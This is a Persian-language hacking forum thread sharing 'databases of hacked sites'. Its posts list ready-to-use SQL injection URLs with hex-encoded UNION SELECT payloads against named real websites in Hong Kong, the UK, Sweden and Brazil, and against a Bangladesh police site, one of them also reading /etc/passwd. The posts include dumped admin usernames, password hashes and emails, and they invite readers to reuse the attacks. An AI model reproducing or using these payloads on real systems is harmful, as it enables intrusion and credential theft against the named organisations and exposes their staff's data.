پرش به


تصویر

دیتابیس سایت های مورد نفوذ قرار گرفته (خارجی)

اختصاصی

 • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
217 پاسخ برای این موضوع

#11 ارسالی 22 ژانویه 2016 - 03:09

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

*
پست محبوب

دیگه تک تک زدن حال نمیده دسته جمعی میزنم میزارم استفاده کنین و تمرین کنین

 

لینک های نفوذ >>>

http://jakewell.com.hk/en/news_detail.php?id=-10%27+UNION+SELECT+1,2,3,4,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28Password%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22626c7565223e204c6f67696e203a20,loginName,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,6,7,8,9,10,11,12,13,14,15,16--%20-
http://www.taxi.org.hk/news_detail.php?id=-331%27+union+select+1,2,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28Password%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22626c7565223e204c6f67696e203a20,loginName,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,4,5,6,7,8,9,10,11,12--%20-
http://www.pharmacyconference.org/news_detail.php?id=-14%27+union+select+1,2,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28Password%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22626c7565223e204c6f67696e203a20,loginName,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,4,5,6,7,8,9,10,11,12--%20-
http://www.beniusgroup.com/tc/news_detail.php?id=-5%27+UNION+SELECT+1,2,3,4,5,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28Password%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22626c7565223e204c6f67696e203a20,loginName,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20-
http://www.timesav.com.hk/news_detail.php?id=-21%27+union+select+1,2,3,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28Password%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22626c7565223e204c6f67696e203a20,loginName,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,5,6,7,8,9,10,11,12,13--%20-
http://www.classicbeaute.com/news_detail.php?id=-12%27+UNION+SELECT+1,2,3,4,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28Password%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22626c7565223e204c6f67696e203a20,loginName,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,6,7,8,9,10,11,12,13,14,15--%20-
http://www.sunshinelaundry.com.hk/zh/news_detail.php?v=v&id=-13%27+UNION+SELECT+1,2,3,4,5,6,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28Password%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22626c7565223e204c6f67696e203a20,loginName,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20-
http://www.clareaaueldergarten.yot.org.hk/news_detail.php?id=-22%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28tb_yot_member%29%20where%20%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22626c7565223e204c6f67696e203a20,username,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,28,29,30,31,32--%20-
http://www.dunn.hk/news_detail.php?id=-38%27+UNION+SELECT+1,2,3,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28Password%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22626c7565223e204c6f67696e203a20,loginName,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,5,6,7,8,9,10,11,12,13,14,15--+

خیلوخب موفق باشید./


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#12 ارسالی 29 ژانویه 2016 - 06:43

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

*
پست محبوب

پلیس بنگلادش

خب حالا نمیخوام زیاد راجبش صحبت کنم و بنگلادش رو بزرگ جلوه بدم و شاید کسای دیگه نفوذ کرده باشن و به چشم نخورده

ولی خب ما اینجا قرار میدیم و بهش نفوذ کردیم.

اداره پلیسشون بود دیگه باگ داشت نفوذ شد.

با تشکر از Mr.Khatar بابت پیدا کردن باگ

نفوذش توسط خودم انجام شد.

 

لینک اینجکت :

http://www.police.gov.bd/content.php?id=-275%27+UNION+SELECT+1,2,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28users%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e742073697a653d222b32223e,0x3c666f6e7420636f6c6f723d22726564223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e203c2f63656e7465723e3c2f666f6e743e3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d226f72616e6765223e2046756c6c4e616d65203a20,full_name,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22626c7565223e20557365726e616d65203a20,user_name,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,pwd,0x33633266363636663665373433652c30783c666f6e7420636f6c6f723d2262726f776e223e20456d61696c203a20,user_email,0x3c2f666f6e743e3c62723e3c68723e,0x3c2f666f6e743e%29%29%29%29x%29,4,5,6,7,8,9,10,11,12,13,14,15,16--+

ی عکس هم از داخل سایت :

 

bang.jpg

 

اینم اطلاعاتش :

ID : 54 FullName : admin Username : admin Password : e9d4f70364e9d667dba7567cdd4530b43378e47bea6122a423c2f666f6e743e,0x Email : admin@localhostID : 73 FullName : admin1 Username : admin1 Password : f276f87b9505ebad783905129982668330de63b1cf222fb7f3c2f666f6e743e,0x Email : admin1@phq.gov.bd

موفق باشید دوستان.


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#13 ارسالی 29 ژانویه 2016 - 07:14

Danger BoY
+2,705
  OFFLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 536 ارسال
  Last Visit 4 هفته قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Unknown

پلیس بنگلادش

خب حالا نمیخوام زیاد راجبش صحبت کنم و بنگلادش رو بزرگ جلوه بدم و شاید کسای دیگه نفوذ کرده باشن و به چشم نخورده

ولی خب ما اینجا قرار میدیم و بهش نفوذ کردیم.

اداره پلیسشون بود دیگه باگ داشت نفوذ شد.

با تشکر از Mr.Khatar بابت پیدا کردن باگ

نفوذش توسط خودم انجام شد.

 

لینک اینجکت :

http://www.police.gov.bd/content.php?id=-275%27+UNION+SELECT+1,2,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28users%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e742073697a653d222b32223e,0x3c666f6e7420636f6c6f723d22726564223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e203c2f63656e7465723e3c2f666f6e743e3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d226f72616e6765223e2046756c6c4e616d65203a20,full_name,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d22626c7565223e20557365726e616d65203a20,user_name,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,pwd,0x33633266363636663665373433652c30783c666f6e7420636f6c6f723d2262726f776e223e20456d61696c203a20,user_email,0x3c2f666f6e743e3c62723e3c68723e,0x3c2f666f6e743e%29%29%29%29x%29,4,5,6,7,8,9,10,11,12,13,14,15,16--+

ی عکس هم از داخل سایت :

 

bang.jpg

 

اینم اطلاعاتش :

ID : 54 FullName : admin Username : admin Password : e9d4f70364e9d667dba7567cdd4530b43378e47bea6122a423c2f666f6e743e,0x Email : admin@localhostID : 73 FullName : admin1 Username : admin1 Password : f276f87b9505ebad783905129982668330de63b1cf222fb7f3c2f666f6e743e,0x Email : admin1@phq.gov.bd

موفق باشید دوستان.

 

سلام اگه ممکنه ستون آسیب پذیر رو هم بگید تا استفاده کنیم


image.gif
Iranonymous Security Team


++++++++++++++++++++++++++++++++
icon3.png


#14 ارسالی 29 ژانویه 2016 - 07:24

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

تارگت :

http://www.baroniimoveisemriviera.com.br

لینک اینجکت :

http://www.baroniimoveisemriviera.com.br/detalhes_imovel.php?Cod=-144%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,0x3c63656e7465723e3c666f6e7420636f6c6f723d22726564222073697a653d222b32223e496e6a656374656420427920426c61636b776f6c665f4972616e3c2f63656e7465723e3c2f666f6e743e,52,load_file%28%27/etc/passwd%27%29,null,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28usuarios%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c666f6e7420636f6c6f723d2267726179223e4e616d65203a20,nome,0x3c666f6e7420636f6c6f723d22626c7565223e204c6f67696e203a20,login,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,senha,0x3c666f6e7420636f6c6f723d226f72616e6765223e20456d61696c203a20,email,0x3c62723e3c68723e%29%29%29%29x%29--+

این یکم زیاد بود کالمن هاش

55

تا بود

 

یوزر و پسورد :

ID : 1Name : Administrador Login : admin Password : 84d8226b0fddae94a9009df6cb51e04d Email : baroni@baroniimoveisemriviera.com

ID : 10Name : Baroni Login : baroni Password : c3aec78931d739068e303d0bc2d842c0 Email : baroni@baroniimoveisemriviera.com.br

هرکی زد نوش جونش

 

موفق باشید.


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#15 ارسالی 29 ژانویه 2016 - 07:29

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

سلام اگه ممکنه ستون آسیب پذیر رو هم بگید تا استفاده کنیم

http://www.police.gov.bd/content.php?id=-275'+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--+

ستون سوم اسیب پذیر هستش

اسپم نکنین

پ.خ کنین

ممنون


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#16 ارسالی 02 فوریه 2016 - 12:17

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

دیگه تک تک زدن حال نمیده :

لینک های اینجکت :

http://dudleycil.org.uk/viewnews.php?id=-7+UNION+SELECT+1,0x3c666f6e7420636f6c6f723d22726564223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28members%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c666f6e7420636f6c6f723d22626c7565223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password%29%29%29%29x%29,4,5--+
http://derbycivicsociety.co.uk/viewnews.php?id=-3+UNION+SELECT+1,0x3c666f6e7420636f6c6f723d22726564223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28members%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c666f6e7420636f6c6f723d22626c7565223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password%29%29%29%29x%29,4,5--+
http://www.moltenmetalproducts.com/viewnews.php?id=-3+UNION+SELECT+1,0x3c666f6e7420636f6c6f723d22726564223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28members%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c666f6e7420636f6c6f723d22626c7565223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password%29%29%29%29x%29,4,5--+
http://www.vcmexams.co.uk/viewnews.php?id=-18+UNION+SELECT+1,0x3c666f6e7420636f6c6f723d22726564223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28members%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c666f6e7420636f6c6f723d22626c7565223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password%29%29%29%29x%29,4,5--+
http://www.ddenterprise.co.uk/viewnews.php?id=-4+UNION+SELECT+1,0x3c666f6e7420636f6c6f723d22726564223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28members%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c666f6e7420636f6c6f723d22626c7565223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password%29%29%29%29x%29,4,5--+
http://accessindudley.org.uk/viewnews.php?id=-49+UNION+SELECT+1,0x3c666f6e7420636f6c6f723d22726564223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28members%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c666f6e7420636f6c6f723d22626c7565223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password%29%29%29%29x%29,4,5--+
http://www.thestuff.org.uk/viewnews.php?id=-160+UNION+SELECT+1,0x3c666f6e7420636f6c6f723d22726564223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28members%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c666f6e7420636f6c6f723d22626c7565223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password%29%29%29%29x%29,4,5--+
http://disabilitydirect.com/nottingham/viewnews.php?id=-8+UNION+SELECT+1,0x3c666f6e7420636f6c6f723d22726564223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28members%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c666f6e7420636f6c6f723d22626c7565223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password%29%29%29%29x%29,4,5--+
http://www.pakistancommunitycentrederby.co.uk/viewnews.php?id=-10+UNION+SELECT+1,0x3c666f6e7420636f6c6f723d22726564223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28members%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c666f6e7420636f6c6f723d22626c7565223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password%29%29%29%29x%29,4,5--+
http://www.chores4you.co.uk/viewnews.php?id=-2+UNION+SELECT+1,0x3c666f6e7420636f6c6f723d22726564223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28members%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,id,0x3c666f6e7420636f6c6f723d22626c7565223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password%29%29%29%29x%29,4,5--+

تارگت های بالا + یوزر و پسورد ادمین :

http://dudleycil.org.uk/

ID : 1 Username : duldeycil-admin Password : 2f2f59e5ae2908d5256e7eb73c07dfee

http://derbycivicsociety.co.uk

 ID : 1 Username : civic123 Password : 642d77d5244ac5b11bd6c8871022566d 

http://www.moltenmetalproducts.com/

 ID : 1 Username : admin Password : 77d9255a77868feef7027acaf4b7e44d

http://www.vcmexams.co.uk/

 ID : 1 Username : vcxm-admin Password : 4bdb9c9e0d1e6db45451eec960c8dde0

http://www.ddenterprise.co.uk/

 ID : 1 Username : admin Password : 882abfac8109e29594da8f2e36d2fb47

http://accessindudley.org.uk/

 ID : 1 Username : access-admin Password : 5db8c6358ef8a10fbfdae0a79d98573b

http://www.thestuff.org.uk/

 ID : 1 Username : thestuff-admin Password : 20b88b52880ba2181adb444f062eb4a1

http://disabilitydirect.com/

 ID : 1 Username : derbynott Password : a944259f4985fd5886a3f9ed314f94cd

http://www.pakistancommunitycentrederby.co.uk/

 ID : 1 Username : admin Password : e3adcb7e8529cff742b021d61354884f

http://www.chores4you.co.uk/

 ID : 1 Username : admin Password : 22c7639d8cb18aa3b56b5c73c482522f

موفق باشید.


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#17 ارسالی 02 فوریه 2016 - 04:29

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

خب فکر کنم این تاپیک رو فقط قراره من پرش کنم دوستان اصلا تلاشی نمیکنن یا به قول خودشون :

"کی حال داره دیتابیس با اس کیو ال بزنه بابا تازه اونم دستی سخت - هویج هست"

یا

به نقل از یکی از دوستان که اسمشو نمیبرم و میخونه خودش بعدا : "عصابت چجوری میکشه واقعا؟؟؟"

ی ذره تلاش کنین یکم هم شما پر کنین تاپیک رو

 

خب بگذریم

 

ی چندتا از دامنه se بریزم (سوئد) فکر نکن خیلی قوی هستن توی امنیت :

 

لینک اینجکت ها :

http://www.wrangel.org/wds_news/article.php?ID=-25+UNION+SELECT+1,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28cms_admin%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,admin_id,0x3c666f6e7420636f6c6f723d22626c7565223e206e616d65203a20,full_name,0x3c666f6e7420636f6c6f723d226f72616e6765223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c666f6e7420636f6c6f723d22726564222073697a653d222b31223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e3c2f63656e7465723e3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,3,4,5,6,7,8,9,10--+
http://wallarp.se/wds_news/article.php?ID=-8+UNION+SELECT+1,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28cms_admin%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,admin_id,0x3c666f6e7420636f6c6f723d22626c7565223e206e616d65203a20,full_name,0x3c666f6e7420636f6c6f723d226f72616e6765223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c666f6e7420636f6c6f723d22726564222073697a653d222b31223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e3c2f63656e7465723e3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,3,4,5,6,7,8,9,10--+
http://demo.webdesignskolan.se/wds_news/article.php?ID=-55+UNION+SELECT+1,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28cms_admin%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,admin_id,0x3c666f6e7420636f6c6f723d22626c7565223e206e616d65203a20,full_name,0x3c666f6e7420636f6c6f723d226f72616e6765223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c666f6e7420636f6c6f723d22726564222073697a653d222b31223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e3c2f63656e7465723e3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,3,4,5,6,7,8,9,10--+
http://johanneshovsjuristen.se/wds_news/article.php?ID=-6+UNION+SELECT+1,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28cms_admin%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,admin_id,0x3c666f6e7420636f6c6f723d22626c7565223e206e616d65203a20,full_name,0x3c666f6e7420636f6c6f723d226f72616e6765223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c666f6e7420636f6c6f723d22726564222073697a653d222b31223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e3c2f63656e7465723e3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,3,4,5,6,7,8,9,10--+
http://feka.se/wds_news/article.php?ID=-19+UNION+SELECT+1,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28cms_admin%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,admin_id,0x3c666f6e7420636f6c6f723d22626c7565223e206e616d65203a20,full_name,0x3c666f6e7420636f6c6f723d226f72616e6765223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c666f6e7420636f6c6f723d22726564222073697a653d222b31223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e3c2f63656e7465723e3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,3,4,5,6,7,8,9,10--+
http://friendsofkabondo.se/wds_news/article.php?ID=-2+UNION+SELECT+1,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28cms_admin%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,admin_id,0x3c666f6e7420636f6c6f723d22626c7565223e206e616d65203a20,full_name,0x3c666f6e7420636f6c6f723d226f72616e6765223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c666f6e7420636f6c6f723d22726564222073697a653d222b31223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e3c2f63656e7465723e3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,3,4,5,6,7,8,9,10--+
